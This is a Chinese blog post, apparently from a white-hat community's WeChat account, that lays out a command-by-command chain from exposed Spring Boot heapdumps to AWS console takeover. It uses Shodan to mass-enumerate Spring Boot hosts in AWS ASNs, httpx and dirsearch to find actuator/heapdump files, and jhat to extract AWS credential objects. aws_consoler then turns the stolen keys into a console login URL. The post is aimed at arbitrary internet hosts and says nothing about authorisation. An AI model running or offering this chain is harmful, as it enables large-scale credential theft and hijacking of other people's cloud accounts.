一.引言
-
全球云厂商有很多,本文主要针对Spring Boot信息泄露在aws上的利用。
二.正文
-
用shodan分析spring boot服务器在asn上分布的情况
-
aws的服务器主要分布在as16509和as14618。
2.通过shodan命令行下载数据
as16509:
shodan download as16509 'http.favicon.hash:116323821 asn:"as16509"' --limit -1
as14618:
shodan download as14618 'http.favicon.hash:116323821 asn:"as14618"' --limit -1
3.通过httpx探测存活的url
shodan parse --fields ip_str,port --separator : as16509.json.gz | httpx -silent -o as16509.txt
4.利用dirsearch扫描存在的heapdump文件
-
所用字典:
heapdump
actuator/heapdump
management/heapdump
-
扫描命令
python3 dirsearch.py -L as16509.txt -w wordlist.txt -e *
-
查看结果
cat reports/BATCH-21-03-1616-47-59/ | grep MB
5.利用jhat分析heapdump
jhat -port 7001 heapdump
主要通过以下关键词来寻找凭证:
-
关键词1: com.amazonaws.auth.BasicAWSCredentials
-
关键词2 :com.amazonaws.auth.BasicSessionCredentials
6.利用aws_consoler来伪造aws控制台登陆凭证。凭证能否生成和所拥有的权限大小,取决于iam所分配的权限。
aws_consoler -v -a <accessKey> -s <secretKey>
aws_consoler -v -a <awsAccessKey> -s <awsSecretKey> -t <sessionToken>
复制url到浏览器中执行,成功登陆到AWS控制台。
ps: 非常感谢我的好朋友老八,渗透界的扛把子,给我推荐的aws_consoler这款工具。
三.参考
-
https://github.com/NetSPI/aws_consoler
-
https://github.com/maurosoria/dirsearch
-
https://github.com/projectdiscovery/httpx
-
https://github.com/LandGrey/SpringBootVulExploit
【周度激励】2021.5.3 ~ 2021.5.9公告
【精选文章推荐】
【火线Zone】
火线Zone是[火线安全平台]运营的封闭式社区,社区成员必须在[火线安全平台]提交有效漏洞才能申请免费加入,符合要求的白帽子可联系[火小表妹]免费加入~
我们不希望出现劣币驱逐良币的结果,我们不希望一个技术社区变成一个水区!
欢迎具备分享精神的白帽子加入火线Zone,共建一个有技术氛围的优质社区!
本文始发于微信公众号(火线Zone):从Spring Boot信息泄露到AWS控制台劫持
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论